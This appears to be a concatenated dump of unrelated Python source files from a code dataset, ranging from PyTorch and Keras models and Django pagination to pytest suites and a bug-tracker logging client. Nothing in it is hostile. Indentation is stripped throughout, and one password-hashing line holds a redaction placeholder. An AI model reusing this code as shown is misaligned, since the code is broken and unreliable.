unary_update, label_all)
message_index = torch.empty(0, dtype=torch.float32)
else:
if is_training:
message_index = unary.new_zeros(n_iter, n_dir, batch, cv, h, w, n_disp, dtype=torch.uint8)
cost_index = unary.new_zeros(n_iter, n_dir, batch, cv, h, w, dtype=torch.uint8)
else:
message_index = torch.empty(0, dtype=torch.uint8)
cost_index = torch.empty(0, dtype=torch.uint8)
TRWP.forward(rho, int(n_iter), 0, unary, label_context,
edge_weights, message, cost_final, message_index, cost_index,
unary_update, label_all)
message_edge_label = torch.empty(0, dtype=torch.float32)
ctx.intermediate_results = rho, args, message_edge_label, message_index, \
cost_index, label_context, edge_weights, enable_edge_weights
del message, message_index, unary_update, label_context, edge_weights
return cost_final, label_all, message_edge_label, cost_index
@staticmethod
def backward(ctx, dcost_final, dlabel_all, dmessage_edge_label, dcost_index):
dcost_final = dcost_final.contiguous()
rho, args, message_edge_label, message_index, cost_index, \
label_context, edge_weights, enable_edge_weights = ctx.intermediate_results
del ctx.intermediate_results
cost_index = args.msg_norm_index if (args.msg_norm_index is not None) else cost_index
n_iter, n_dir, batch, cv, h, w = cost_index.size()
n_disp = args.n_classes
TRWP = TRWP_seg if (n_disp == 21) else TRWP_stereo
dunary = dcost_final.new_zeros(batch, cv, h, w, n_disp)
dmessage = dcost_final.new_zeros(n_dir, batch, cv, h, w, n_disp)
dunary_update = dcost_final.new_zeros(batch, cv, h, w, n_disp)
dedge_weights = dcost_final.new_zeros(n_dir, batch, cv, h, w)
if args.enable_seg:
dlabel_context = dcost_final.new_zeros(n_disp, n_disp)
else:
dlabel_context = dcost_final.new_zeros(n_disp)
if args.mpnet_enable_soft:
TRWP.backward_soft(rho, dcost_final, label_context, edge_weights, message_edge_label,
cost_index, dunary, dlabel_context, dedge_weights,
dmessage, dunary_update)
else:
TRWP.backward(rho, label_context, edge_weights, dcost_final, message_index,
cost_index, dunary, dlabel_context, dedge_weights,
dmessage, dunary_update)
del message_edge_label, message_index, cost_index, label_context, \
edge_weights, dcost_final, dmessage, dunary_update
dedge_weights = None if (not enable_edge_weights) else dedge_weights
return dunary, dlabel_context, dedge_weights, None, None, None
class MPModule(torch.nn.Module):
def __init__(self, args, enable_create_label_context=False, enable_saving_label=False):
super(MPModule, self).__init__()
self.args = args
self.args.enable_saving_label = enable_saving_label
self.args.rho = 0.5 if (args.mpnet_mrf_mode == 'TRWP') else 1
self.args.enable_seg = True if (args.n_classes == 21) else False
self.smoothness_train = args.mpnet_smoothness_train if args.mpnet_smoothness_train else None
self.smoothness_mode = args.mpnet_smoothness_mode if args.mpnet_smoothness_mode else None
self.smoothness_trunct_value = args.mpnet_smoothness_trunct_value
self.smoothness_trunct_loc = args.mpnet_smoothness_trunct_loc
if enable_create_label_context:
self.create_label_context()
def get_label_context(self):
return self.label_context, self.label_context_loc, self.label_context_diag_loc
def set_label_context(self, label_context, label_context_loc, label_context_diag_loc):
self.label_context = label_context
self.label_context_loc = label_context_loc
self.label_context_diag_loc = label_context_diag_loc
def create_label_context(self):
self.label_context, self.label_context_loc, self.label_context_diag_loc = \
create_label_context(self.args, enable_seg=self.args.enable_seg,
enable_symmetric=self.args.enable_symmetric)
def forward(self, unary, edge_weights=None, msg_norm_index=None, pairwise_terms=None):
# unary:(batch,cv,n_disp,h,w); label_context:(n_disp,n_disp) for seg and (n_disp) for stereo
# edge_weights:(batch,n_dir,h,w) unsqueeze(1) and permute to be (n_dir,batch,cv,h,w)
unary = unary.permute(0, 1, 3, 4, 2).contiguous()
if True:
edge_weights = edge_weights.unsqueeze(1).permute(2, 0, 1, 3, 4).contiguous() \
if (edge_weights is not None) else edge_weights
else:
# TODO : switch on for debugging when n_cv > 1 in test_parallel_grad.py
edge_weights = edge_weights.unsqueeze(0).permute(2, 0, 1, 3, 4).contiguous() \
if (edge_weights is not None) else edge_weights
label_context = self.label_context * self.args.mpnet_term_weight
if self.args.mpnet_smoothness_train == 'sigmoid':
label_context_valid = label_context[self.label_context_loc].flatten()
label_context[self.label_context_loc] = 2 * torch.sigmoid(label_context_valid)
elif self.args.mpnet_smoothness_train == 'softmax':
label_context_valid = label_context[self.label_context_loc].flatten()
label_context_max = label_context_valid.max()
label_context_norm = nn.Softmax(dim=0)(label_context_valid)
label_context_norm_max = label_context_norm.max()
label_context[self.label_context_loc] = label_context_norm * label_context_max / label_context_norm_max
if self.args.mpnet_smoothness_train in {'sigmoid', 'softmax'}:
label_context[self.label_context_diag_loc] = self.args.mpnet_diag_value
if edge_weights is not None:
assert unary.size()[-3:-1] == edge_weights.size()[-2:]
if unary.is_cuda and (msg_norm_index is not None):
msg_norm_index = msg_norm_index.cuda()
self.args.msg_norm_index = msg_norm_index
self.args.training = self.training
if self.args.mpnet_mrf_mode == 'TRWP':
cost_final, cost_all, message_vector, message_index = \
TRWPFunction.apply(unary, label_context, edge_weights, self.args)
else:
assert False
cost_final = cost_final.permute(0, 1, 4, 2, 3).contiguous()
label_context = label_context.unsqueeze(0) # Create a batch
return cost_final, label_context, cost_all, message_vector, message_index
| 2.1875
| 2
|
read_file_names.py
|
rajatagarwal/Filtered_Copy_Paste
| 0
|
12780069
|
<reponame>rajatagarwal/Filtered_Copy_Paste
from os import walk
from shutil import copyfile
# To get list of files names in the "text" file
f = []
external_disk_path = '/Volumes/My Passport/XXXX'
for (dir_path, dir_names, file_names) in walk(external_disk_path):
f.extend(file_names)
break
print("File names to be copied:")
print(file_names)
destination_file = open("/Users/file_name.txt", "w")
for item in file_names:
destination_file.write(item)
destination_file.write("\n")
destination_file.close()
| 3.734375
| 4
|
2021/15/sol.py
|
tjacquemin-ledger/aoc
| 0
|
12780070
|
<reponame>tjacquemin-ledger/aoc<filename>2021/15/sol.py
input = open('input', 'r').read().strip()
input = [list(map(int, r)) for r in input.splitlines()]
def neighbours(x, y, h, w):
return {(p, q) for u, v in ((1, 0), (0, -1), (-1, 0), (0, 1))
if 0 <= (p := x+u) < h and 0 <= (q := y+v) < w}
def p1():
m = input
# Dict based
seen, bag = set(), {(0, 0): 0}
while bag:
x, y = min(bag, key=bag.get)
risk = bag.pop((x, y))
seen.add((x, y))
if (x, y) == (len(m)-1, len(m[0])-1): return risk
for p, q in neighbours(x, y, len(m), len(m[0])):
if (p, q) in seen or risk + m[p][q] >= bag.get((p, q), float('inf')): continue
bag[p, q] = risk + m[p][q]
def p2():
m = [[(n+u+v-1) % 9 + 1 for v in range(5) for n in r] for u in range(5) for r in input]
# Heap based
from heapq import heappush, heappop
mins, bag = {(0, 0): 0}, [(0, (0, 0))]
while bag:
risk, (x, y) = heappop(bag)
if (x, y) == (len(m)-1, len(m[0])-1): return risk
for p, q in neighbours(x, y, len(m), len(m[0])):
if risk + m[p][q] < mins.get((p, q), float('inf')):
mins[p, q] = risk + m[p][q]
heappush(bag, (risk + m[p][q], (p, q)))
if (r1 := p1()) is not None: print(r1)
if (r2 := p2()) is not None: print(r2)
| 2.546875
| 3
|
costar_models/python/costar_models/pretrain_image.py
|
cpaxton/costar_plan
| 66
|
12780071
|
from __future__ import print_function
import keras.backend as K
import keras.losses as losses
import keras.optimizers as optimizers
import numpy as np
from keras.callbacks import ModelCheckpoint
from keras.layers.advanced_activations import LeakyReLU
from keras.layers import Input, RepeatVector, Reshape
from keras.layers.embeddings import Embedding
from keras.layers.merge import Concatenate, Multiply
from keras.losses import binary_crossentropy
from keras.models import Model, Sequential
from .multi_sampler import *
class PretrainImageAutoencoder(RobotMultiPredictionSampler):
def __init__(self, taskdef, *args, **kwargs):
'''
As in the other models, we call super() to parse arguments from the
command line and set things like our optimizer and learning rate.
'''
super(PretrainImageAutoencoder, self).__init__(taskdef, *args, **kwargs)
self.PredictorCb = ImageCb
self.save_encoder_decoder = True
def _makePredictor(self, features):
'''
Create model to predict possible manipulation goals.
'''
(images, arm, gripper) = features
img_shape, image_size, arm_size, gripper_size = self._sizes(
images,
arm,
gripper)
img_in = Input(img_shape,name="predictor_img_in")
img0_in = Input(img_shape,name="predictor_img0_in")
option_in = Input((1,), name="predictor_option_in")
encoder = self._makeImageEncoder(img_shape)
ins = [img0_in, img_in]
# Create the encoder
enc = encoder(img_in)
#enc = Dropout(self.dropout_rate)(enc)
decoder = self._makeImageDecoder(
self.hidden_shape,
self.skip_shape,)
out = decoder(enc)
if not self.no_disc:
# Create the discriminator to make sure this is a good image
image_discriminator = MakeImageClassifier(self, img_shape)
image_discriminator.load_weights(
self.makeName("discriminator", "classifier"))
image_discriminator.trainable = False
o2 = image_discriminator([img0_in, out])
if self.no_disc:
ae = Model(ins, [out])
ae.compile(
loss=["mae"],
loss_weights=[1.],
optimizer=self.getOptimizer())
else:
ae = Model(ins, [out, o2])
ae.compile(
loss=["mae"] + ["categorical_crossentropy"],
loss_weights=[1.,1e-3],
optimizer=self.getOptimizer())
encoder.summary()
decoder.summary()
ae.summary()
return ae, ae, None, [img_in], enc
def _getData(self, *args, **kwargs):
features, targets = GetAllMultiData(self.num_options, *args, **kwargs)
[I, q, g, oin, label, q_target, g_target,] = features
o1 = targets[1]
I0 = I[0,:,:,:]
length = I.shape[0]
I0 = np.tile(np.expand_dims(I0,axis=0),[length,1,1,1])
if self.no_disc:
return [I0, I], [I]
else:
o1_1h = np.squeeze(ToOneHot2D(o1, self.num_options))
return [I0, I], [I, o1_1h]
| 2.375
| 2
|
backend/clubs/filters.py
|
pennlabs/penn-clubs
| 23
|
12780072
|
import random
from collections import OrderedDict
from urllib.parse import quote
from rest_framework import filters
from rest_framework.pagination import PageNumberPagination
from rest_framework.response import Response
DEFAULT_PAGE_SIZE = 15
DEFAULT_SEED = 1234
class OptionalPageNumberPagination(PageNumberPagination):
"""
Optional pagination that does not paginate the response
if the user does not specify it.
"""
page_size = DEFAULT_PAGE_SIZE
page_size_query_param = "page_size"
def paginate_queryset(self, queryset, request, view=None):
if self.page_query_param not in request.query_params:
return None
return super().paginate_queryset(queryset, request, view)
class RandomPageNumberPagination(OptionalPageNumberPagination):
"""
Custom pagination that supports randomly sorting objects with pagination.
Must be used with the associated ordering filter.
"""
def paginate_queryset(self, queryset, request, view=None):
if "random" in request.query_params.get("ordering", "").split(","):
rng = random.Random(request.GET.get("seed", DEFAULT_SEED))
results = list(queryset)
rng.shuffle(results)
self._random_count = getattr(request, "_original_item_count", None)
if self._random_count is None:
self._random_count = queryset.model.objects.count()
else:
del request._original_item_count
page = int(request.GET.get("page", 1))
page_size = int(request.GET.get("page_size", DEFAULT_PAGE_SIZE))
if (page - 1) * page_size >= self._random_count:
self._random_next_page = None
else:
new_params = request.GET.dict()
new_params["page"] = str(page + 1)
self._random_next_page = "{}?{}".format(
request.build_absolute_uri(request.path),
"&".join(
["{}={}".format(k, quote(v)) for k, v in new_params.items()]
),
)
return results
return super().paginate_queryset(queryset, request, view)
def get_paginated_response(self, data):
if hasattr(self, "_random_next_page"):
return Response(
OrderedDict(
[
("count", self._random_count),
("next", self._random_next_page),
("results", data),
]
)
)
return super().get_paginated_response(data)
class RandomOrderingFilter(filters.OrderingFilter):
"""
Custom ordering filter that supports random pagination.
Must be used with the associated pagination class.
"""
def filter_queryset(self, request, queryset, view):
new_queryset = super().filter_queryset(request, queryset, view)
ordering = request.GET.get("ordering", "").split(",")
# handle random ordering
if "random" in ordering:
page = int(request.GET.get("page", 1)) - 1
page_size = int(request.GET.get("page_size", DEFAULT_PAGE_SIZE))
rng = random.Random(request.GET.get("seed", DEFAULT_SEED))
all_ids = list(new_queryset.order_by("id").values_list("id", flat=True))
rng.shuffle(all_ids)
start_index = page * page_size
end_index = (page + 1) * page_size
page_ids = all_ids[start_index:end_index]
request._original_item_count = new_queryset.count()
return new_queryset.filter(id__in=page_ids)
return new_queryset
| 3.0625
| 3
|
assignements/test_S3.py
|
YoanRouleau/BachelorDIM-Lectures-Algorithms-2020
| 0
|
12780073
|
<filename>assignements/test_S3.py
import S3_imgproc_tools as tobetested
import pytest
import numpy as np
def test_invert_color_numpy_tuNone():
with pytest.raises(ValueError):
tobetested.invert_color_numpy(None)
def test_invert_color_numpy_tuArray():
with pytest.raises(TypeError):
tobetested.invert_color_numpy(1)
def test_invert_color_numpy_tuuint8():
with pytest.raises(TypeError):
tobetested.invert_color_numpy(np.zeros((2,2), dtype=np.float32))
| 2.1875
| 2
|
tests/test_undos/test_coreutils/test_mv.py
|
joshmeranda/undo
| 0
|
12780074
|
<gh_stars>0
import os
import shutil
import unittest
import undo.resolve as resolve
import undo.expand as expand
import tests.test_undos.test_coreutils.common as common
class TestMv(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
if os.path.exists(common.COREUTILS_TEST_ENV_DIR):
shutil.rmtree(common.COREUTILS_TEST_ENV_DIR)
os.mkdir(common.COREUTILS_TEST_ENV_DIR)
os.mknod(os.path.join(
common.COREUTILS_TEST_ENV_DIR,
"OUTER"
))
os.mkdir(os.path.join(
common.COREUTILS_TEST_ENV_DIR,
"DIR"
))
os.mknod(os.path.join(
common.COREUTILS_TEST_ENV_DIR,
"DIR",
"INNER"
))
os.mknod(os.path.join(
common.COREUTILS_TEST_ENV_DIR,
"DIR",
"ANOTHER_INNER"
))
cwd_bak = os.getcwd()
os.chdir(common.COREUTILS_TEST_ENV_DIR)
cls.addClassCleanup(shutil.rmtree, common.COREUTILS_TEST_ENV_DIR)
cls.addClassCleanup(os.chdir, cwd_bak)
def test_rename(self):
command = "mv ORIGINAL OUTER"
expected = []
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, False, "sh")]
self.assertListEqual(expected, actual)
expected = ["mv OUTER ORIGINAL"]
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, True, "sh")]
self.assertListEqual(expected, actual)
def test_rename_precise(self):
command = "mv --no-clobber ORIGINAL OUTER"
expected = ["mv OUTER ORIGINAL"]
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, False, "sh")]
self.assertListEqual(expected, actual)
def test_move_single(self):
command = "mv INNER DIR"
expected = []
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, False, "sh")]
self.assertListEqual(expected, actual)
expected = ["mv DIR/INNER INNER"]
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, True, "sh")]
self.assertListEqual(expected, actual)
def test_move_single_precise(self):
command = "mv --no-clobber INNER DIR"
expected = ["mv DIR/INNER INNER"]
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, False, "sh")]
self.assertListEqual(expected, actual)
def test_move_multiple(self):
command = "mv INNER ANOTHER_INNER DIR"
expected = []
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, False, "sh")]
self.assertListEqual(expected, actual)
expected = ["mv DIR/INNER INNER; mv DIR/ANOTHER_INNER ANOTHER_INNER"]
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, True, "sh")]
self.assertListEqual(expected, actual)
def test_move_multiple_precise(self):
command = "mv --no-clobber INNER ANOTHER_INNER DIR"
expected = ["mv DIR/INNER INNER; mv DIR/ANOTHER_INNER ANOTHER_INNER"]
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, False, "sh")]
self.assertListEqual(expected, actual)
def test_move_single_with_target_directory(self):
command = "mv -t DIR INNER"
expected = []
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, False, "sh")]
self.assertListEqual(expected, actual)
expected = ["mv DIR/INNER INNER"]
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, True, "sh")]
self.assertListEqual(expected, actual)
def test_move_single_with_target_directory_precise(self):
command = "mv --no-clobbe -t DIR INNER"
expected = ["mv DIR/INNER INNER"]
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, False, "sh")]
self.assertListEqual(expected, actual)
def test_move_multiple_with_target_directory(self):
command = "mv -t DIR INNER ANOTHER_INNER"
expected = []
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, False, "sh")]
self.assertListEqual(expected, actual)
expected = ["mv DIR/INNER INNER; mv DIR/ANOTHER_INNER ANOTHER_INNER"]
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, True, "sh")]
self.assertListEqual(expected, actual)
def test_move_multiple_with_target_directory_precise(self):
command = "mv --no-clobber -t DIR INNER ANOTHER_INNER"
expected = ["mv DIR/INNER INNER; mv DIR/ANOTHER_INNER ANOTHER_INNER"]
actual = [expand.expand(undo, env, ("%", "%"), "; ")
for env, undo in
resolve.resolve(command, [common.COREUTILS_UNDO_DIR], False, False, "sh")]
self.assertListEqual(expected, actual)
if __name__ == "__main__":
unittest.main()
| 2.265625
| 2
|
ZathuraProject/__init__.py
|
ibtehaz-shawon/LoggerProject
| 1
|
12780075
|
import inspect
import os
import sys
import time
from datetime import datetime
from uuid import uuid4
import pkg_resources
import pyfiglet
from ZathuraProject.bugtracker import (send_data_to_bugtracker,
send_verbose_log_to_bugtracker)
CURRENT_VERSION = "v0.0.6 beta"
def create_app():
if sys.version_info < (3, 0, 0):
print("Zathura needs python3.x to perform normally!")
sys.exit(255)
pyfiglet_ascii() # spits out zathura in speed font
print("*#$" * 20)
print("Current version: {}".format(CURRENT_VERSION))
print("*#$" * 20)
return
def pyfiglet_ascii():
"""
Prints out Zathura using pyfiglet package, speed font.
"""
print(pyfiglet.figlet_format("Zathura", font="speed"))
class Zathura:
def __init__(self, bugtracker_url: str = None,
project_token: str = None):
"""
Initiates zathura using bugtracker url and project token.
:param: bugtracker_url: str
:param: project_token: str
"""
self.verbose_url = None
self.error_url = None
self.project_token = project_token
if bugtracker_url is not None:
if bugtracker_url[-1:] != '/':
bugtracker_url += '/'
self.error_url = bugtracker_url + "project/error/log/"
self.verbose_url = bugtracker_url + "project/verbose/log/"
def log_error(self, error_name, error_description, user=None):
"""
logs error in bugtracker server.
:param: error_name, error name.
:param: error_description: str This should include all the necessary details of an exception.
:param: user: str It's an optional field. This will help to uniquely identify a user.
:returns: bool whether log has been logged successfully
"""
point_of_origin = (inspect.stack()[1].function).lower()
if self.error_url is not None:
return send_data_to_bugtracker(
name=error_name,
description=error_description,
origin=point_of_origin,
token=self.project_token,
url=self.error_url,
user=user
)
return False
def log_verbose(self, description=None, user=None):
"""
logs verbose (debug) in bugtracker server.
:param: description: str This could be a long description of any debug message you want to see.
:param: user: str It's an optional field. This will help to uniquely identify a user.
:returns: bool whether log has been logged successfully
"""
point_of_origin = (inspect.stack()[1].function).lower()
if self.verbose_url is not None:
return send_verbose_log_to_bugtracker(
origin=point_of_origin,
description=description,
project_token=self.project_token,
bugtracker_url=self.verbose_url,
user=user
)
return False
| 2.375
| 2
|
tests/unit/test_util.py
|
galsuchetzky/PytorchTemplate
| 1
|
12780076
|
<filename>tests/unit/test_util.py
import unittest
"""
TODO testing:
1)
"""
class TestClassName(unittest.TestCase):
def test_(self):
self.assertIsNotNone(None)
if __name__ == '__main__':
unittest.main()
| 2.546875
| 3
|
part3/webapp/final/pypi_web_mongodb_f/pypi_web_mongodb/services/user_service.py
|
israelrico007/build-pypi-mongodb-webcast-series
| 25
|
12780077
|
from typing import Optional
from passlib.handlers.sha2_crypt import sha512_crypt
from pypi_web_mongodb.data.users import User
def user_count() -> int:
return User.objects().count()
def user_by_id(user_id) -> Optional[User]:
return User.objects().filter(id=user_id).first()
def user_by_email(email: str) -> Optional[User]:
found = User.objects().filter(email=email).first()
return found
def create_account(full_name: str, email: str, plain_text_password: str) -> Optional[User]:
if not email or not email.strip():
raise Exception("Email address required")
if not plain_text_password or not plain_text_password.strip():
raise Exception("Password required")
email = email.strip().lower()
found = user_by_email(email)
if found:
raise Exception("User with email {} already exists.".format(email))
user = User()
user.email = email
user.name = full_name
user.hashed_password = <PASSWORD>(plain_text_password)
user.save()
return user
def login_account(email: str, plain_text_password: str) -> Optional[User]:
if not email or not email.strip():
return None
if not plain_text_password or not plain_text_password.strip():
return None
email = email.strip().lower()
found = user_by_email(email)
if not found:
return None
if not verify_hash(found.hashed_password, plain_text_password):
return None
return found
def hash_text(text: str) -> str:
hashed_text = sha512_crypt.encrypt(text, rounds=150000)
return hashed_text
def verify_hash(hashed_text: str, plain_text: str) -> bool:
return sha512_crypt.verify(plain_text, hashed_text)
| 2.6875
| 3
|
CoAttention_utils.py
|
abhishekyana/VQA
| 2
|
12780078
|
import torch
import numpy as np
import pickle
def filterit(s,W2ID):
s=s.lower()
S=''
for c in s:
if c in ' abcdefghijklmnopqrstuvwxyz0123456789':
S+=c
S = " ".join([x if x and x in W2ID else "<unk>" for x in S.split()])
return S
def Sentence2Embeddings(sentence,W2ID,EMB):
if type(sentence)==str:
sentence = filterit(sentence, W2ID)
#print(sentence)
IDS = torch.tensor([W2ID[i] for i in sentence.split(" ")])
return EMB(IDS)
if type(sentence)==list:
sembs = []
for sent in sentence:
sent = filterit(sent,W2ID)
IDS = torch.tensor([W2ID[i] for i in sent.split(" ")])
sembs.append(EMB(IDS))
sembs = torch.nn.utils.rnn.pad_sequence(sembs,batch_first=True)
return sembs
def GetEmbeddings(path='./student_code/supportfiles/GloVe300.d'):
GloVe = pickle.load(open(path,'rb'))
W2ID = {w:i for i,w in enumerate(sorted(list(GloVe.keys())))}
EMB = torch.nn.Embedding(len(W2ID),300)
EMB.weight.requires_grad=False
GloVeW = np.vstack([GloVe[w] for w in W2ID])
EMB.weight.data.copy_(torch.from_numpy(GloVeW))
return W2ID, EMB
def getAnsWords(path='./student_code/supportfiles/CoAttAns.d'):
with open(path,'rb') as file:
data = pickle.load(file)
return data
def Answer2OneHot1(answers,AW):
A=[]
for answer in answers:
Aembs = torch.zeros(len(AW))
for w in answer.split(" "):
if w in AW:
Aembs[AW[w]]=1
break
else:
Aembs[0]=1
break
A.append(Aembs)
A = torch.stack(A)
return A
def Answer2OneHot(answers,AW):
A=[]
for answer in answers:
Aembs = torch.zeros(len(AW))
w = answer.split(" ")[0]
if w in AW:Aembs[AW[w]]=1
else:Aembs[-1]=1
A.append(Aembs)
A = torch.stack(A)
return A
| 2.4375
| 2
|
test/test_mod_group.py
|
dvkruchinin/python_tr
| 0
|
12780079
|
#!/usr/bin/env python
# coding:utf-8
"""
Name : test_mod_group.py
Author : <NAME>
Date : 6/21/2021
Desc:
"""
from model.group import Group
from random import randrange
def test_modification_some_group(app, db, check_ui):
if len(db.get_group_list()) == 0:
app.group.create(Group(name="test"))
old_groups = db.get_group_list()
index = randrange(len(old_groups))
group = Group(name="111", header="222", footer="333")
group.id = old_groups[index].id
app.group.modification_group_by_id(group.id, group)
new_groups = db.get_group_list()
old_groups[index] = group
assert old_groups == new_groups
if check_ui:
assert sorted(old_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)
def test_modification_some_group_name(app, db, check_ui):
if len(db.get_group_list()) == 0:
app.group.create(Group(name="test"))
old_groups = db.get_group_list()
index = randrange(len(old_groups))
group = Group(name="New group")
group.id = old_groups[index].id
app.group.modification_group_by_id(group.id, group)
new_groups = db.get_group_list()
old_groups[index] = group
assert old_groups == new_groups
if check_ui:
assert sorted(old_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)
def test_modification_some_group_header(app, db, check_ui):
if len(db.get_group_list()) == 0:
app.group.create(Group(name="test"))
old_groups = db.get_group_list()
index = randrange(len(old_groups))
group = Group(header="New header")
group.id = old_groups[index].id
group.name = old_groups[index].name
app.group.modification_group_by_id(group.id, group)
new_groups = db.get_group_list()
old_groups[index] = group
assert old_groups == new_groups
if check_ui:
assert sorted(old_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)
def test_modification_some_group_footer(app, db, check_ui):
app.group.create_group_if_missing()
old_groups = db.get_group_list()
index = randrange(len(old_groups))
group = Group(footer="New footer")
group.id = old_groups[index].id
group.name = old_groups[index].name
app.group.modification_group_by_id(group.id, group)
new_groups = db.get_group_list()
old_groups[index] = group
assert old_groups == new_groups
if check_ui:
assert sorted(old_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)
| 2.484375
| 2
|
single_eval.py
|
wbj0110/cnn-text-classification-tf-chinese
| 0
|
12780080
|
#! /usr/bin/env python
import tensorflow as tf
import numpy as np
import os
import data_helpers
import csv
import pickle
import data_helpers as dp
import json
# Parameters
# ==================================================
# Data Parameters
tf.flags.DEFINE_string("positive_data_file", "./data/rt-polaritydata/rt-polarity.pos", "Data source for the positive data.")
tf.flags.DEFINE_string("negative_data_file", "./data/rt-polaritydata/rt-polarity.neg", "Data source for the positive data.")
# Eval Parameters
tf.flags.DEFINE_integer("batch_size", 64, "Batch Size (default: 64)")
tf.flags.DEFINE_string("checkpoint_dir", "../runs/1548399951/checkpoints/", "Checkpoint directory from training run")
tf.flags.DEFINE_boolean("eval_train", False, "Evaluate on all training data")
# Misc Parameters
tf.flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
tf.flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
FLAGS = tf.flags.FLAGS
#FLAGS._parse_flags()
FLAGS.flag_values_dict()
print("\nParameters:")
for attr, value in sorted(FLAGS.__flags.items()):
print("{}={}".format(attr.upper(), value))
print("")
runs_path = os.path.abspath(os.path.join(FLAGS.checkpoint_dir, os.path.pardir))
vacabulary_path = os.path.join(runs_path, "vocab")
print("vacabulary path:"+vacabulary_path)
vacabulary_file = open(vacabulary_path, "rb")
vacabulary = pickle.load(vacabulary_file)
vacabulary_file.close()
#load sequence length
sequence_path = os.path.join(runs_path, "sequence_lenth")
sequence_file = open(sequence_path, "rb")
sequence_length = pickle.load(sequence_file)
sequence_file.close()
print("sequence is {0}",sequence_length)
label_list = []
label_json_path = os.path.join(runs_path, "lable.json")
with open(label_json_path,'r') as load_f:
label_list = json.load(load_f)
def classify(text):
x_text = [list(text.strip())]
sentences_padded = dp.pad_sentences(x_text, sequence_length=sequence_length)
x = np.array([[vacabulary.get(word,0) for word in sentence] for sentence in sentences_padded])
print("\npredict...\n")
# Evaluation
# ==================================================
checkpoint_file = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)
graph = tf.Graph()
with graph.as_default():
session_conf = tf.ConfigProto(
allow_soft_placement=FLAGS.allow_soft_placement,
log_device_placement=FLAGS.log_device_placement)
sess = tf.Session(config=session_conf)
with sess.as_default():
# Load the saved meta graph and restore variables
saver = tf.train.import_meta_graph("{}.meta".format(checkpoint_file))
saver.restore(sess, checkpoint_file)
# Get the placeholders from the graph by name
input_x = graph.get_operation_by_name("input_x").outputs[0]
# input_y = graph.get_operation_by_name("input_y").outputs[0]
dropout_keep_prob = graph.get_operation_by_name("dropout_keep_prob").outputs[0]
# Tensors we want to evaluate
predictions = graph.get_operation_by_name("output/predictions").outputs[0]
single_predictions = sess.run(predictions, {input_x: x, dropout_keep_prob: 1.0})
predict_label = label_list[int(single_predictions)]
print(predict_label)
return predict_label
| 2.140625
| 2
|
custom_components/citymind_water_meter/managers/configuration_manager.py
|
elad-bar/citymind_water_meter
| 17
|
12780081
|
from typing import Optional
from homeassistant.config_entries import ConfigEntry
from ..helpers.const import (
CONF_LOG_LEVEL,
CONF_PASSWORD,
CONF_USERNAME,
LOG_LEVEL_DEFAULT,
)
from ..models.config_data import ConfigData
from .password_manager import PasswordManager
class ConfigManager:
data: ConfigData
config_entry: ConfigEntry
password_manager: PasswordManager
def __init__(self, password_manager: Optional[PasswordManager]):
self.password_manager = password_manager
async def update(self, config_entry: ConfigEntry):
data = config_entry.data
options = config_entry.options
result: ConfigData = await self.get_basic_data(data)
result.log_level = options.get(CONF_LOG_LEVEL, LOG_LEVEL_DEFAULT)
self.config_entry = config_entry
self.data = result
async def get_basic_data(self, data):
result = ConfigData()
if data is not None:
result.username = data.get(CONF_USERNAME)
result.password = data.get(CONF_PASSWORD)
if (
result.password is not None
and len(result.password) > 0
and self.password_manager is not None
):
decrypt = self.password_manager.decrypt
result.password_clear_text = await decrypt(result.password)
else:
result.password_clear_text = result.password
return result
@staticmethod
def _get_allowed_option(key, options):
allowed_audio_sensor = None
if key in options:
allowed_audio_sensor = options.get(key, [])
return allowed_audio_sensor
@staticmethod
def _get_config_data_item(key, options, data):
data_result = data.get(key, "")
result = options.get(key, data_result)
return result
| 2.359375
| 2
|
test/test.py
|
casonadams/nvim-colors
| 0
|
12780082
|
<reponame>casonadams/nvim-colors<gh_stars>0
@decorator(param=1)
def f(x):
"""
Syntax Highlighting Demo
@param x Parameter
Semantic highlighting:
Generated spectrum to pick colors for local variables and parameters:
Color#1 SC1.1 SC1.2 SC1.3 SC1.4 Color#2 SC2.1 SC2.2 SC2.3 SC2.4 Color#3
Color#3 SC3.1 SC3.2 SC3.3 SC3.4 Color#4 SC4.1 SC4.2 SC4.3 SC4.4 Color#5
"""
def nested_func(y):
print(y + 1)
s = ("Test", 2+3, {'a': 'b'}, f'{x!s:{"^10"}}') # Comment
f(s[0].lower())
nested_func(42)
if True:
pass
else:
pass
class Foo:
